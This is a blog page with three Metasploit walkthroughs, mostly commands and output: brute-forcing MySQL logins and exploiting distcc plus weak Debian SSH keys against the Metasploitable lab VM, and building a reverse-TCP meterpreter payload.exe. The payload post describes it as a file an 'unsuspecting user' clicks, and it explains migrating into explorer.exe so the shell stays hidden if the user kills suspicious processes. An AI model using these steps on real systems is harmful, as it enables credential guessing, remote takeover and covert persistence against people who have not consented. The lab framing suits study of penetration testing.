Bruteforce MySQL Using Metasploit…

July 3, 2010 at 11:52 am (Metasploit, Security)

Hey guys,

I will demonstrate how to brute force MySQL logins using Metasploit. This is again another attack against the Metasploitable distribution I mentioned in my previous post. This is very simple and shouldn’t take long to demonstrate, so here goes:

root@bt:/pentest/exploits/framework3# ./msfconsole

__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|


=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search mysql
[*] Searching loaded modules for pattern 'mysql'...

Auxiliary
=========

Name Rank Description
---- ---- -----------
admin/mysql/mysql_enum normal MySQL Enumeration Module
admin/mysql/mysql_sql normal MySQL SQL Generic Query
admin/tikiwiki/tikidblib normal TikiWiki information disclosure
scanner/mysql/mysql_login normal MySQL Login Utility
scanner/mysql/mysql_version normal MySQL Server Version Enumeration

Exploits
========

Name Rank Description
---- ---- -----------
linux/mysql/mysql_yassl_getname good MySQL yaSSL CertDecoder::GetName Buffer Overflow
linux/mysql/mysql_yassl_hello good MySQL yaSSL SSL Hello Message Buffer Overflow
windows/mysql/mysql_yassl_hello average MySQL yaSSL SSL Hello Message Buffer Overflow

msf > use scanner/mysql/mysql_login
msf auxiliary(mysql_login) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE no File containing passwords, one per line
RHOSTS yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(mysql_login) > set PASS_FILE /root/password.txt
PASS_FILE => /root/password.txt
msf auxiliary(mysql_login) > set USER_FILE /root/users.txt
USER_FILE => /root/users.txt
msf auxiliary(mysql_login) > set RHOSTS 10.113.8.102
RHOSTS => 10.113.8.102
msf auxiliary(mysql_login) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
BLANK_PASSWORDS true yes Try blank passwords for all users
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
PASSWORD no A specific password to authenticate with
PASS_FILE /root/password.txt no File containing passwords, one per line
RHOSTS 10.113.8.102 yes The target address range or CIDR identifier
RPORT 3306 yes The target port
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
THREADS 1 yes The number of concurrent threads
USERNAME no A specific username to authenticate as
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
USER_FILE /root/users.txt no File containing usernames, one per line
VERBOSE true yes Whether to print output for all attempts

msf auxiliary(mysql_login) > exploit

[*] 10.113.8.102:3306 - Found remote MySQL version 5.0.51a
[*] 10.113.8.102:3306 Trying username:'admin' with password:''
[*] 10.113.8.102:3306 failed to login as 'admin' with password ''
[*] 10.113.8.102:3306 Trying username:'root' with password:''
[*] 10.113.8.102:3306 failed to login as 'root' with password ''
[*] 10.113.8.102:3306 Trying username:'god' with password:''
[*] 10.113.8.102:3306 failed to login as 'god' with password ''
[*] 10.113.8.102:3306 Trying username:'systemadm' with password:''
[*] 10.113.8.102:3306 failed to login as 'systemadm' with password ''
[*] 10.113.8.102:3306 Trying username:'daemon' with password:''
[*] 10.113.8.102:3306 failed to login as 'daemon' with password ''
[*] 10.113.8.102:3306 Trying username:'admin' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'root'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'root'
[*] 10.113.8.102:3306 Trying username:'admin' with password:'adminadmin'
[*] 10.113.8.102:3306 failed to login as 'admin' with password 'adminadmin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'pass'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'pass'
[*] 10.113.8.102:3306 Trying username:'root' with password:'password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'PASSWD'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'PASSWD'
[*] 10.113.8.102:3306 Trying username:'root' with password:'passwd'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'passwd'
[*] 10.113.8.102:3306 Trying username:'root' with password:'Password'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'Password'
[*] 10.113.8.102:3306 Trying username:'root' with password:'admin'
[*] 10.113.8.102:3306 failed to login as 'root' with password 'admin'
[*] 10.113.8.102:3306 Trying username:'root' with password:'root'
[+] 10.113.8.102:3306 - SUCCESSFUL LOGIN 'root' : 'root'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(mysql_login) >

Bingo! We found the root password which is simply ‘root’ 🙂 Now let’s double check this:

root@bt:/pentest/exploits/framework3# mysql -h 10.113.8.102 -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 53
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| tikiwiki |
| tikiwiki195 |
+--------------------+
4 rows in set (0.01 sec)

mysql>

Now we have complete control over their database, yay! 🙂

Permalink 6 Comments

Hacking distcc with Metasploit…

July 3, 2010 at 11:27 am (Metasploit, Security)

Hey,

I have been playing around with Metasploitable. This is a test system produced by the Metasploit team that is very vulnerable. One of the services it is running is distcc. Today I will show you how to own it using Metasploit…

First of all we shall start with a port scan of the system:

root@bt:~# nmap -sV -sS -p1-65535 10.113.8.102

Starting Nmap 5.21 ( http://nmap.org ) at 2010-07-03 11:04 BST
Nmap scan report for ml-dkelly.messagelabs.com (10.113.8.102)
Host is up (0.0034s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.1
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp open telnet Linux telnetd
25/tcp open smtp Postfix smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp open postgresql PostgreSQL DB
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1
MAC Address: 00:0C:29:9F:54:C9 (VMware)
Service Info: Host: metasploitable.localdomain; OSs: Unix, Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.45 seconds
root@bt:~#

We are most interested in the following line:

3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Right, so let’s fire up Metasploit then:

root@bt:/pentest/exploits/framework3# ./msfconsole

____________

------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 276 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9671 updated today (2010.07.03)

msf > search distcc
[*] Searching loaded modules for pattern ‘distcc’…

Exploits
========

Name Rank Description
---- ---- -----------
unix/misc/distcc_exec excellent DistCC Daemon Command Execution

msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 3632 yes The target port


Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > set RHOST 10.113.8.102
RHOST => 10.113.8.102
msf exploit(distcc_exec) > show payloads

Compatible Payloads
===================

Name Rank Description
---- ---- -----------
cmd/unix/bind_perl normal Unix Command Shell, Bind TCP (via perl)
cmd/unix/bind_ruby normal Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/generic normal Unix Command, Generic command execution
cmd/unix/reverse normal Unix Command Shell, Double reverse TCP (telnet)
cmd/unix/reverse_perl normal Unix Command Shell, Reverse TCP (via perl)
cmd/unix/reverse_ruby normal Unix Command Shell, Reverse TCP (via Ruby)

msf exploit(distcc_exec) > set payload cmd/unix/bind_perl
payload => cmd/unix/bind_perl
msf exploit(distcc_exec) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 10.113.8.102 yes The target address
RPORT 3632 yes The target port

Payload options (cmd/unix/bind_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 10.113.8.102 no The target address

Exploit target:

Id Name
-- ----
0 Automatic Target

msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (10.113.10.116:55064 -> 10.113.8.102:4444) at Sat Jul 03 11:54:29 +0100 2010

whoami; uname -ar
daemon
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable

Excellent, so we managed to get a bind shell working and now have command execution on the target system.. but what else can we do? Well we should be able to use their ssh key and login as root. First we must download: debian_ssh_rsa_2048_x86.tar.bz2. You can quickly pop that into google and find a place to download such as here. Once you have downloaded it, un-compress it, then perform the following steps:

* SNIP *
rsa/2048/22395760ea6265919ef5db8d26dda56c-17578
rsa/2048/e311fc52da0d062cd6e9a507a7470db8-15835.pub
rsa/2048/ae88b6e25a832541ac60978e90fb40fe-28014
rsa/2048/759ee1c853d2fcc07a13e6867ed75a35-26843
rsa/2048/22817b9fcfca9c043d6d48dac528b0a6-3298
rsa/2048/cd84c0196af31046b45037f39208c9c1-11710
rsa/2048/9634a42c34d72e776593a9f1ddd38085-2633
rsa/2048/1668b5d4171480a6359c0966ded47550-15730
rsa/2048/b8a7774ef9e5b9b2b73a685e509b899b-2131
root@bt:~/rsa/2048# grep -lir AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub

57c3115d77c56390332dc5c49978627a-5429.pub
root@bt:~/rsa/2048# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@10.113.8.102
Last login: Sat Jul 3 07:01:04 2010 from 10.113.10.116
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have mail.
root@metasploitable:~#

So we managed to get a shell on the vulnerable system 🙂

Permalink 1 Comment

Payloads and Metasploit

May 31, 2010 at 8:57 pm (Metasploit, Security)

Hey,

I have been playing around with the Metasploit Framework over the weekend. Something I found rather interesting was the msfpayload tool. I will show you how to create a TCP reverse connect shell for windows machines. Be aware that these binaries will be detected by Anti Virus software. There are quite a lot of tutorials around on the web that talk about making binaries undetectable to Anti Virus software. Maybe in the not so distant future I will write a post about it, but for now onto creating the payload…

root@bt:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.65 LPORT=4444 X > payload.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.1.65,LPORT=4444
root@bt:/pentest/exploits/framework3#

This will create a binary called payload.exe that when an unsuspecting user clicks on will open a remote TCP connection to: 192.168.1.65 on port 4444. Now on that machine what you want to have already running is:

root@bt:/pentest/exploits/framework3# ./msfconsole

=[ metasploit v3.4.1-dev [core:3.4 api:1.0]
+ -- --=[ 553 exploits - 263 auxiliary
+ -- --=[ 208 payloads - 23 encoders - 8 nops
=[ svn r9381 updated today (2010.05.30)

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.65
LHOST => 192.168.1.65
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.65:4444
[*] Starting the payload handler...
[*] Sending stage (748032 bytes) to 192.168.1.64
[*] Meterpreter session 1 opened (192.168.1.65:4444 -> 192.168.1.64:61267) at Mon May 31 21:38:53 +0100 2010

meterpreter > ps

Process list
============

PID Name Arch Session User Path
--- ---- ---- ------- ---- ----
0 [System Process]
4 System
272 smss.exe
372 csrss.exe
424 wininit.exe
456 csrss.exe
480 services.exe
520 winlogon.exe
532 lsass.exe
540 lsm.exe
656 svchost.exe
720 nvvsvc.exe
760 svchost.exe
848 svchost.exe
916 svchost.exe
944 svchost.exe
360 svchost.exe
1016 nvvsvc.exe
1148 svchost.exe
1328 spoolsv.exe
1356 svchost.exe
1532 MDM.EXE
1584 ccsvchst.exe
1664 vmware-usbarbitrator.exe
1244 vmnat.exe
1232 vmware-authd.exe
1808 taskhost.exe x64 1 workstation\zoidberg C:\Windows\System32\taskhost.exe
1108 ccsvchst.exe x86 1
1684 vmnetdhcp.exe
2696 svchost.exe
204 dwm.exe x64 1 workstation\zoidberg C:\Windows\System32\dwm.exe
2852 explorer.exe x64 1 workstation\zoidberg C:\Windows\explorer.exe
2916 sidebar.exe x64 1 workstation\zoidberg C:\Program Files\Windows Sidebar\sidebar.exe
364 jusched.exe x86 1 workstation\zoidberg C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
732 hqtray.exe x86 1 workstation\zoidberg C:\Program Files (x86)\VMware\VMware Player\hqtray.exe
2404 SearchIndexer.exe
2036 svchost.exe
3144 wmpnetwk.exe
3228 svchost.exe
3840 Azureus.exe x86 1 workstation\zoidberg C:\Program Files (x86)\Vuze\Azureus.exe
2936 firefox.exe x86 1 workstation\zoidberg C:\Program Files (x86)\Mozilla Firefox\firefox.exe
612 SearchProtocolHost.exe
1088 SearchFilterHost.exe
2408 cmd.exe x64 1 workstation\zoidberg C:\Windows\System32\cmd.exe
2676 conhost.exe x64 1 workstation\zoidberg C:\Windows\System32\conhost.exe
4052 payload.exe x86 1 workstation\zoidberg C:\Users\zoidberg\Downloads\payload.exe
3360 NETSTAT.EXE x64 1 workstation\zoidberg C:\Windows\System32\NETSTAT.EXE
3772 Bubbles.scr x64 1 workstation\zoidberg C:\Windows\System32\Bubbles.scr

meterpreter > migrate 2852
[*] Migrating to 2852...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer: WORKSTATION
OS : Windows 7 (Build 7600, ).
Arch : x64
Language: en_GB
meterpreter >

As you can see, it sits there waiting for a connection on port 4444 if it receives a connection then it will drop a meterprerter shell.

Issuing the migrate pid command above in the meterpreter shell basically migrates the process from the binary which we originally connected on to the explorer.exe process (which is the current logged in users sessions process). So now our meterprerter shell will stay open until the user logs out. This is a good trick in case the user notices that the binary was malicious and kills any abnormal processes.

Permalink Leave a Comment